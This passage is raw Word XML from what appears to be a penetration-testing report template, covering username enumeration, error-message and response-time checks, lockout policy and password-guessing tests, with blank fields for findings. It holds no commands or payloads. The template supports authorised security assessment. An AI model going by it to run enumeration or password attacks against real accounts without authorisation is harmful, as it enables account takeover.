              <w:t>Username Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F376D9" w:rsidRPr="00F376D9" w14:paraId="36A24A46" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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7DA69BCB" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00A1224B" w:rsidRDefault="00F376D9" w:rsidP="00F376D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A1224B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Valid Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BB3AA89" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00A1224B" w:rsidRDefault="00F376D9" w:rsidP="00F376D9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A1224B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Corresponding Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F376D9" w:rsidRPr="00F376D9" w14:paraId="50D5E02A" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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0B0826B1" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52C0FDCF" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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376D9" w:rsidRPr="00F376D9" w14:paraId="6CDCD515" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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38058FAA" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48652F85" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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376D9" w:rsidRPr="00F376D9" w14:paraId="788A42E6" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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6EE789AD" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4399A636" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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376D9" w:rsidRPr="00F376D9" w14:paraId="13994A4A" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="469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6B357739" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="56"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="590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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="4665" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D2BC7B4" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="57"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="575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376D9" w:rsidRPr="00F376D9" w14:paraId="6B979363" w14:textId="77777777" w:rsidTr="0029398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AC3C322" w14:textId="2103BEEB" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00EF5917" w:rsidP="002939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F591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Login Error Message Observations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78C242D" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00EF5917" w:rsidRDefault="00EF5917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EF591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[*Does the application differentiate between valid and invalid usernames? Yes/No, Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2287EDDF" w14:textId="77777777" w:rsidR="00EF5917" w:rsidRDefault="00EF5917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BCA2188" w14:textId="77777777" w:rsidR="00EF5917" w:rsidRDefault="00EF5917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CA8C0D8" w14:textId="77777777" w:rsidR="007457F0" w:rsidRDefault="007457F0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6E7F9C9" w14:textId="77777777" w:rsidR="007457F0" w:rsidRDefault="007457F0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6AB7AEC" w14:textId="47869FB5" w:rsidR="00A1224B" w:rsidRPr="00F376D9" w:rsidRDefault="00A1224B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C666C" w:rsidRPr="00F376D9" w14:paraId="3568AB5B" w14:textId="77777777" w:rsidTr="0029398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36CE0DA" w14:textId="77777777" w:rsidR="001C666C" w:rsidRDefault="00D97531" w:rsidP="002939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D97531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Password Reset Error Message Observations</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A603522" w14:textId="2D233581" w:rsidR="00D97531" w:rsidRPr="00F376D9" w:rsidRDefault="00D97531" w:rsidP="002939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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7018D0CF" w14:textId="77777777" w:rsidR="001C666C" w:rsidRDefault="00D97531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D9753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[*Does it indicate if an email/username exists? Yes/No, Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06C3EF1A" w14:textId="77777777" w:rsidR="007457F0" w:rsidRDefault="007457F0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E8FCB39" w14:textId="77777777" w:rsidR="007457F0" w:rsidRDefault="007457F0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6DA2944" w14:textId="77777777" w:rsidR="007457F0" w:rsidRDefault="007457F0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7E348B3" w14:textId="7F06FA6A" w:rsidR="007457F0" w:rsidRPr="00D97531" w:rsidRDefault="007457F0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E0A07" w:rsidRPr="00F376D9" w14:paraId="335D4643" w14:textId="77777777" w:rsidTr="0029398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2791C56" w14:textId="5F6A3D61" w:rsidR="005E0A07" w:rsidRPr="00D97531" w:rsidRDefault="005E0A07" w:rsidP="002939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5E0A0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Response Time Analysis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22F592B" w14:textId="77777777" w:rsidR="005E0A07" w:rsidRDefault="005E0A07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5E0A0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Longer response for valid usernames? Yes/No, Details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62F4679" w14:textId="77777777" w:rsidR="005E0A07" w:rsidRDefault="005E0A07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7409106" w14:textId="77777777" w:rsidR="007457F0" w:rsidRDefault="007457F0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0D03E17" w14:textId="77777777" w:rsidR="007457F0" w:rsidRDefault="007457F0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B40E34F" w14:textId="7F95857A" w:rsidR="005E0A07" w:rsidRPr="00D97531" w:rsidRDefault="005E0A07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E0A07" w:rsidRPr="00F376D9" w14:paraId="4411991F" w14:textId="77777777" w:rsidTr="0029398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17C85B8" w14:textId="3545D3DA" w:rsidR="005E0A07" w:rsidRPr="005E0A07" w:rsidRDefault="00DD133D" w:rsidP="002939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DD133D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Username Exposure in Registration Process?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A50E98E" w14:textId="77777777" w:rsidR="005E0A07" w:rsidRDefault="00DD133D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DD133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 Messages if found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425F312" w14:textId="77777777" w:rsidR="00DD133D" w:rsidRDefault="00DD133D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2AD770D" w14:textId="77777777" w:rsidR="00DD133D" w:rsidRDefault="00DD133D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122833E" w14:textId="7F9D50BF" w:rsidR="00DD133D" w:rsidRDefault="00DD133D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D133D" w:rsidRPr="00F376D9" w14:paraId="2CB489B2" w14:textId="77777777" w:rsidTr="0029398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A7D92E2" w14:textId="4C744BA0" w:rsidR="00DD133D" w:rsidRPr="00DD133D" w:rsidRDefault="001278A9" w:rsidP="002939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1278A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>User-Specific URLs Observed?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926A264" w14:textId="77777777" w:rsidR="00DD133D" w:rsidRDefault="001278A9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1278A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 URLs if found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0A83217" w14:textId="77777777" w:rsidR="001278A9" w:rsidRDefault="001278A9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8B19FCF" w14:textId="77777777" w:rsidR="001278A9" w:rsidRDefault="001278A9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E78D5F2" w14:textId="28447670" w:rsidR="001278A9" w:rsidRDefault="001278A9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1278A9" w:rsidRPr="00F376D9" w14:paraId="4730053B" w14:textId="77777777" w:rsidTr="0029398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7ED44FE" w14:textId="6AF9FE8D" w:rsidR="001278A9" w:rsidRPr="001278A9" w:rsidRDefault="001278A9" w:rsidP="002939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1278A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Account Lockout Policy Implemented?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00F5868" w14:textId="77777777" w:rsidR="001278A9" w:rsidRDefault="001278A9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</w:t>
            </w:r>
            <w:r w:rsidR="00196E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*</w:t>
            </w:r>
            <w:r w:rsidR="00196EA8" w:rsidRPr="00196E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Lockout Threshold if applicable</w:t>
            </w:r>
            <w:r w:rsidR="00196EA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41C9A43" w14:textId="77777777" w:rsidR="00196EA8" w:rsidRDefault="00196EA8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743AA4B" w14:textId="77777777" w:rsidR="00196EA8" w:rsidRDefault="00196EA8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47C7F64" w14:textId="43F43AC4" w:rsidR="00196EA8" w:rsidRDefault="00196EA8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196EA8" w:rsidRPr="00F376D9" w14:paraId="1A2178C1" w14:textId="77777777" w:rsidTr="0029398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7FDB610" w14:textId="0DA28A79" w:rsidR="00196EA8" w:rsidRDefault="00196EA8" w:rsidP="002939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196EA8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Potential Exploit Paths</w:t>
            </w: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 Identified</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412A2AFB" w14:textId="77777777" w:rsidR="00196EA8" w:rsidRPr="001278A9" w:rsidRDefault="00196EA8" w:rsidP="002939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  <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09BFB222" w14:textId="54BE90C3" w:rsidR="00196EA8" w:rsidRDefault="00196EA8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[*If any]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00196EA8" w:rsidRPr="00F376D9" w14:paraId="2E45F1F2" w14:textId="77777777" w:rsidTr="0029398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B6F595C" w14:textId="6C71E522" w:rsidR="00196EA8" w:rsidRPr="00196EA8" w:rsidRDefault="001A26E4" w:rsidP="002939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Other </w:t>
            </w:r>
            <w:r w:rsidRPr="001A26E4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5FC4755" w14:textId="70E1DBD7" w:rsidR="00196EA8" w:rsidRDefault="001A26E4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1A26E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Verbose Error Messages, Lack of Rate Limiting, User Enumeration via API Responses,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ADAD12A" w14:textId="77777777" w:rsidR="001A26E4" w:rsidRDefault="001A26E4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989FBA9" w14:textId="77777777" w:rsidR="001A26E4" w:rsidRDefault="001A26E4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9C3F976" w14:textId="77777777" w:rsidR="001A26E4" w:rsidRDefault="001A26E4" w:rsidP="001C66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376D9" w:rsidRPr="00F376D9" w14:paraId="0825A98C" w14:textId="77777777" w:rsidTr="0029398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0FE2D22" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="002939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376D9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216480C" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="58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BD6ADE7" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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5DA63F1" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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638D30B" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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D051334" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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6BE934B" w14:textId="77777777" w:rsidR="00F376D9" w:rsidRPr="00F376D9" w:rsidRDefault="00F376D9" w:rsidP="00F376D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269A32CB" w14:textId="77777777" w:rsidR="00883268" w:rsidRPr="00A51A96" w:rsidRDefault="00883268" w:rsidP="00883268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3268" w14:paraId="67BD741D" w14:textId="77777777" w:rsidTr="008C15EE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="049B5DD5" w14:textId="77777777" w:rsidR="00883268" w:rsidRDefault="00883268" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="576B5DD0" w14:textId="77777777" w:rsidR="00883268" w:rsidRDefault="00883268" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CFADF8F" w14:textId="77777777" w:rsidR="00883268" w:rsidRDefault="00883268" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4F5F5979" w14:textId="77777777" w:rsidR="00883268" w:rsidRDefault="00883268" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17F85FB6" w14:textId="77777777" w:rsidR="00883268" w:rsidRDefault="00883268" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E7C7A0C" w14:textId="77777777" w:rsidR="00883268" w:rsidRDefault="00883268" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7862E949" w14:textId="77777777" w:rsidR="00883268" w:rsidRDefault="00883268" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C87F0" w14:textId="77777777" w:rsidR="00883268" w:rsidRDefault="00883268" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6117C3C0" w14:textId="77777777" w:rsidR="00883268" w:rsidRDefault="00883268" w:rsidP="008C15EE">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25FB6EE1" w14:textId="77777777" w:rsidR="00C83884" w:rsidRDefault="00C83884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377F11" w:rsidRPr="00A51A96" w14:paraId="375A3D34" w14:textId="77777777" w:rsidTr="00642FAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="30AB5149" w14:textId="7909CF3C" w:rsidR="00377F11" w:rsidRPr="003C713F" w:rsidRDefault="00377F11" w:rsidP="008C15E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4.</w:t>
            </w:r>
            <w:r w:rsidR="009F2E79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>4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202BFC" w:rsidRPr="00202BFC">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Resilience to Password Guessing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="781AA283" w14:textId="77777777" w:rsidR="00377F11" w:rsidRPr="0029398E" w:rsidRDefault="00377F11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7457F0" w:rsidRPr="007457F0" w14:paraId="22C91098" w14:textId="77777777" w:rsidTr="0029398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FEACC7F" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="002939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457F0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1DB423AB" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F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457F0" w:rsidRPr="007457F0" w14:paraId="045608D0" w14:textId="77777777" w:rsidTr="0029398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68E56E9" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="002939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457F0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6DA8EB41" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F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457F0" w:rsidRPr="007457F0" w14:paraId="4E0A6DB1" w14:textId="77777777" w:rsidTr="0029398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39CD220" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="002939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457F0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shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6236092A" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F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457F0" w:rsidRPr="007457F0" w14:paraId="5EDCCB9D" w14:textId="77777777" w:rsidTr="0029398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11F0C8D" w14:textId="5805716E" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="002939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color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007457F0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Techniques </w:t>
            </w:r>
            <w:r w:rsidR="0029398E" w:rsidRPr="007457F0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Used</w:t>
            </w:r>
            <w:r w:rsidRPr="007457F0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to Gather </w:t>
            </w:r>
            <w:r w:rsidRPr="007457F0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Password </w:t>
            </w:r>
            <w:r w:rsidR="0029398E" w:rsidRPr="007457F0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Lists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F312A42" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="59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C2EDFD3" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="59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D4D6952" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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DCE51D8" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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F26AA66" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5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9641095" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F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457F0" w:rsidRPr="007457F0" w14:paraId="6CAC8540" w14:textId="77777777" w:rsidTr="0029398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77C3BAC" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="002939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457F0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Dictionary of all possible passwords</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="540A1611" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="61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1FD6930" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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1B91634" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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4959279" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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920EDAA" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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F4A9E6C" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F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457F0" w:rsidRPr="007457F0" w14:paraId="205DC89C" w14:textId="77777777" w:rsidTr="0029398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180D75F" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="002939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457F0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Password Attacks Performed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36D31960" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="60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B8144C0" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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9376188" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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CA54179" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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ACD9918" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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C771B44" w14:textId="77777777" w:rsidR="007457F0" w:rsidRPr="007457F0" w:rsidRDefault="007457F0" w:rsidP="007457F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97A36" w:rsidRPr="007457F0" w14:paraId="705B32FE" w14:textId="77777777" w:rsidTr="0029398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9528ABE" w14:textId="4B3FB689" w:rsidR="00C97A36" w:rsidRPr="007457F0" w:rsidRDefault="00C97A36" w:rsidP="002939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Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54C341AF" w14:textId="77777777" w:rsidR="00C97A36" w:rsidRDefault="00C97A36" w:rsidP="00C97A3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C373877" w14:textId="77777777" w:rsidR="00C97A36" w:rsidRDefault="00C97A36" w:rsidP="00C97A3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EA162E1" w14:textId="77777777" w:rsidR="00C97A36" w:rsidRPr="007457F0" w:rsidRDefault="00C97A36" w:rsidP="00C97A3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97A36" w:rsidRPr="007457F0" w14:paraId="4887D0E6" w14:textId="77777777" w:rsidTr="0029398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12935E7" w14:textId="56FDE669" w:rsidR="00C97A36" w:rsidRDefault="00954619" w:rsidP="002939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Are Attacks Successful?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F988D78" w14:textId="77777777" w:rsidR="00C97A36" w:rsidRDefault="00954619" w:rsidP="00C97A3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95461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[*Yes/No, Provide details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BEB1D57" w14:textId="77777777" w:rsidR="00954619" w:rsidRDefault="00954619" w:rsidP="00C97A3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F3977B8" w14:textId="77777777" w:rsidR="00184CE7" w:rsidRDefault="00184CE7" w:rsidP="00C97A3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25913C6" w14:textId="77777777" w:rsidR="00954619" w:rsidRDefault="00954619" w:rsidP="00C97A3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505BF48" w14:textId="7E01E275" w:rsidR="00954619" w:rsidRPr="00954619" w:rsidRDefault="00954619" w:rsidP="00C97A3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184CE7" w:rsidRPr="007457F0" w14:paraId="1BA30840" w14:textId="77777777" w:rsidTr="00481AD8">
        <w:trPr>
